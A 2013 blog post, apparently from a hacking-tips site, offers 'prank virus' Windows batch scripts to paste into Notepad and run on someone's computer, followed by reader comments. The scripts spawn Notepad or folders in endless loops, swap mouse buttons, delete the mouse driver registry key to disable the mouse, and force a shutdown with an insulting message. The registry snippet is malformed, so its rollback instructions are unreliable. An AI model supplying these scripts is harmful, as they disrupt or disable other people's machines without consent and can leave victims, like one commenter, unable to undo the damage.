Tuesday, 1 January 2013

Cool Batch Virus Codes


Hello guys, First of all “HAPPY NEW YEAR 2013” to you all.
Today I going to tell you that how to make some cool  Viruses with a simple Batch Code, 
So without wasting your time I going to start procedure.
cool_virus_codes.jpg

HOW TO USE BELOW CODES/SCRIPTS
1) Open Notepad.
[Go to start button-All programs-Accessories-Notepad]
2) Copy Any of the One code from below codes..and paste that in notepad.
3)  Now save the file with “*.bat” [ALL FILES] extension.
cool_virus_codes2.jpg





Batch Codes/Scripts

  1. Open Notepad Continuously

  2. 
    @echo off
    Title Prank@Emrithacks
    :loop
    Start Notepad
    Goto loop
     
    

  3. Make 1000 folder within a second.

  4. 
    @echo off
    Title Prank@Emrithacks
    :loop
    md %random%
    Goto loop

  5. Make 1000 Folder (Folder in folder &...so on) within 3seconds

  6. 
    @echo off
    Title Prank@Emrithacks
    cd "C:\Documents and Settings\%USERNAME%\Desktop"
    set num=1
    :loop
    md %num%
    cd %num%
    set /a num=%num%+1
    goto loop

  7. Open So many applications with a Single Click

  8. 
    @echo off
    Title Prank@Emrithacks
    start notepad
    start explorer.exe
    start chrome.exe
    start explorer.exe
    start calc

  9. Swap(exchange) Mouse Button

  10. 
    @echo off
    Title Prank@Emrithacks
    Rundll32 User32,SwapMouseButton

  11. Disable Mouse

  12. 
    @echo off
    Title Prank@Emrithacks
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Service\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t
    REG_DWORD /d 4

    How Rollback the changes:- Just Change the last line of above code with "REG_DWORD /d 3" without quotes.

  13. Convey a message & Shutdown his / her computer

  14. 
    @echo off
    Title Prank@Emrithacks
    msg * I want to say something..
    shutdown -c Error! You are too stupid! -s

5 comments:

  1. dude this is quite interesting batch codes...

    ReplyDelete
  2. Very great post. I simply stumbled upon your blog and wanted to say that I have really enjoyed browsing your weblog posts. After all I’ll be subscribing on your feed and I am hoping you write again very soon!

    ReplyDelete
  3. https://utip.io/rapidofurious

    ReplyDelete
  4. cara sem querer eu troquei o mouse, como eu volto ao normal ?

    ReplyDelete